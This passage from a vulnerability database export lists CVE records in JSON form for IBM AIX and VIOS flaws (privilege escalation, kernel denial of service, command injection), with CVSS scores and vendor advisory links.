"C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6483875", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6483875 (AIX)", "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129801-priv-escalation (203977)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/203977" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-29801", "datePublished": "2021-08-26T19:25:27.686749Z", "dateReserved": "2021-03-31T00:00:00", "dateUpdated": "2024-09-17T01:11:01.851Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38995
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6558948 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/213073 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:58:16.519Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6558948" }, { "name": "ibm-aix-cve202138995-dos (213073)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213073" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2022-02-23T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213073." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/I:N/UI:N/C:N/A:H/AV:L/AC:L/S:U/PR:N/RL:O/RC:C/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-02-24T17:05:19", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6558948" }, { "name": "ibm-aix-cve202138995-dos (213073)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213073" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-02-23T00:00:00", "ID": "CVE-2021-38995", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213073." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6558948", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6558948 (AIX)", "url": "https://www.ibm.com/support/pages/node/6558948" }, { "name": "ibm-aix-cve202138995-dos (213073)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213073" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38995", "datePublished": "2022-02-24T17:05:19.828000Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-17T01:31:22.557Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-28528
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T13:43:22.622Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6983232" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/251207" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/172458/IBM-AIX-7.2-inscout-Privilege-Escalation.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to execute arbitrary commands. IBM X-Force ID: 251207." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to execute arbitrary commands. IBM X-Force ID: 251207." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-78", "description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-28T02:06:06.829Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6983232" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/251207" }, { "url": "http://packetstormsecurity.com/files/172458/IBM-AIX-7.2-inscout-Privilege-Escalation.html" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX command execution", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-28528", "datePublished": "2023-04-28T02:06:06.829Z", "dateReserved": "2023-03-16T21:05:56.576Z", "dateUpdated": "2024-08-02T13:43:22.622Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2012-0723
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=isg1IV22696 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=isg1IV22694 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV22697 | vendor-advisory, x_refsource_AIXAPAR | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/74134 | vdb-entry, x_refsource_XF | |
http://www.securitytracker.com/id?1027315 | vdb-entry, x_refsource_SECTRACK | |
http://www.ibm.com/support/docview.wss?uid=isg1IV22695 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV22693 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T18:38:13.857Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "IV22696", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22696" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc" }, { "name": "IV22694", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22694" }, { "name": "IV22697", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22697" }, { "name": "aix-dupmsg-dos(74134)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74134" }, { "name": "1027315", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id?1027315" }, { "name": "IV22695", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22695" }, { "name": "IV22693", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22693" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2012-07-26T00:00:00", "descriptions": [ { "lang": "en", "value": "The kernel in IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly implement the dupmsg system call, which allows local users to cause a denial of service (system crash) via a crafted application." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-28T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "IV22696", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22696" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc" }, { "name": "IV22694", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22694" }, { "name": "IV22697", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22697" }, { "name": "aix-dupmsg-dos(74134)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74134" }, { "name": "1027315", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id?1027315" }, { "name": "IV22695", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22695" }, { "name": "IV22693", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22693" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2012-0723", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The kernel in IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly implement the dupmsg system call, which allows local users to cause a denial of service (system crash) via a crafted application." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "IV22696", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22696" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc" }, { "name": "IV22694", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22694" }, { "name": "IV22697", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22697" }, { "name": "aix-dupmsg-dos(74134)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74134" }, { "name": "1027315", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id?1027315" }, { "name": "IV22695", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22695" }, { "name": "IV22693", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV22693" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2012-0723", "datePublished": "2012-07-30T19:00:00", "dateReserved": "2012-01-17T00:00:00", "dateUpdated": "2024-08-06T18:38:13.857Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-39164
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6847947 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/235181 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T11:10:32.540Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/235181" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 235181." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 235181." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-400", "description": "CWE-400 Uncontrolled Resource Consumption", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-23T19:26:58.929Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/235181" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-39164", "datePublished": "2022-12-23T19:26:58.929Z", "dateReserved": "2022-09-01T20:20:58.939Z", "dateUpdated": "2024-08-03T11:10:32.540Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-3035
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=isg1IV42124 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42229 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42095 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42264 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV37925 | vendor-advisory, x_refsource_AIXAPAR | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/84657 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42072 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/inet_advisory.asc | x_refsource_CONFIRM | |
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19253 | vdb-entry, signature, x_refsource_OVAL |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T16:00:08.370Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "IV42124", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42124" }, { "name": "IV42229", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42229" }, { "name": "IV42095", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42095" }, { "name": "IV42264", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42264" }, { "name": "IV37925", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV37925" }, { "name": "aix-cve20133035-dos(84657)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/84657" }, { "name": "IV42072", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42072" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/inet_advisory.asc" }, { "name": "oval:org.mitre.oval:def:19253", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19253" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-06-04T00:00:00", "descriptions": [ { "lang": "en", "value": "The IPv6 implementation in the inet subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allows remote attackers to cause a denial of service (system hang) via a crafted packet to an IPv6 interface." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-18T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "IV42124", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42124" }, { "name": "IV42229", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42229" }, { "name": "IV42095", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42095" }, { "name": "IV42264", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42264" }, { "name": "IV37925", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV37925" }, { "name": "aix-cve20133035-dos(84657)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/84657" }, { "name": "IV42072", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42072" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/inet_advisory.asc" }, { "name": "oval:org.mitre.oval:def:19253", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19253" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2013-3035", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The IPv6 implementation in the inet subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allows remote attackers to cause a denial of service (system hang) via a crafted packet to an IPv6 interface." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "IV42124", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42124" }, { "name": "IV42229", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42229" }, { "name": "IV42095", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42095" }, { "name": "IV42264", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42264" }, { "name": "IV37925", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV37925" }, { "name": "aix-cve20133035-dos(84657)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/84657" }, { "name": "IV42072", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42072" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/inet_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/inet_advisory.asc" }, { "name": "oval:org.mitre.oval:def:19253", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19253" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2013-3035", "datePublished": "2013-06-21T14:00:00", "dateReserved": "2013-04-12T00:00:00", "dateUpdated": "2024-08-06T16:00:08.370Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29693
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6467129 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/200255 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:18:02.467Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6467129" }, { "name": "ibm-aix-cve202129693-dos (200255)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/200255" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2021-06-25T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user that is in the with elevated group privileges to cause a denial of service due to a vulnerability in the lpd daemon. IBM X-Force ID: 200255." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 4.3, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AC:L/A:H/I:N/PR:H/AV:N/UI:N/S:U/C:N/RC:C/RL:O/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-06-28T15:55:23", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6467129" }, { "name": "ibm-aix-cve202129693-dos (200255)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/200255" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-06-25T00:00:00", "ID": "CVE-2021-29693", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a local user that is in the with elevated group privileges to cause a denial of service due to a vulnerability in the lpd daemon. IBM X-Force ID: 200255." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "N", "C": "N", "I": "N", "PR": "H", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6467129", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6467129 (AIX)", "url": "https://www.ibm.com/support/pages/node/6467129" }, { "name": "ibm-aix-cve202129693-dos (200255)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/200255" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-29693", "datePublished": "2021-06-28T15:55:23.763125Z", "dateReserved": "2021-03-31T00:00:00", "dateUpdated": "2024-09-17T03:55:05.247Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-43380
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6847947 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/238640 | vdb-entry |
